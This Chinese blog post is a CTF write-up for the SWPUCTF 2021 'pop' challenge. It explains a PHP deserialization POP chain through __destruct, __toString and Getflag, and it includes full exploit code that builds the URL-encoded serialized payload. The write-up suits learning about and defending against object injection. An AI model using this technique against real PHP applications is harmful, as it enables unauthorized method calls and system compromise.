[SWPUCTF 2021 新生赛]pop

很明显了 反序列化 pop
构造pop链,主要还是 死盯 反序列化的魔法函数
从__destruct()入手,这里echo

可以调用到__toString

__toString 调用 function Getflag()

w44m类中两个变量并不是共有属性(关于属性文末有链接)
private:是PHP中类的私有成员
protected:是PHP中类的保护成员
所以我们就直接在类中进行赋值

如何调用w44m类中Getflag方法?
在w33m类中tostring方法,可以调用某一个类中的某一个方法。
因此可以给w33m类中的两个变量w00m=w44m类名,w22m=Getflag方法
如何调用w33m类呢?
destruct在对象被销毁时调用,所以给w22m类中的变量w00m一个类w33m就可以调用

pop链(在学校机房写的没有环境,找的php在线编译)


有私有属性的一定要url编码一下,会有不可见字符

完整pop链

<?php 
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}


$p = new w22m();
$p->w00m = new w33m();
$p->w00m->w00m=new w44m();
$p->w00m->w22m='Getflag';
echo urlencode(serialize($p));
?>

不了解属性的可以看看PHP类中public、protected、private的区别 PHP类中public、protected、private实例代码

posted @ 2023-05-27 19:19  Y_Onism  阅读(246)  评论(0编辑  收藏  举报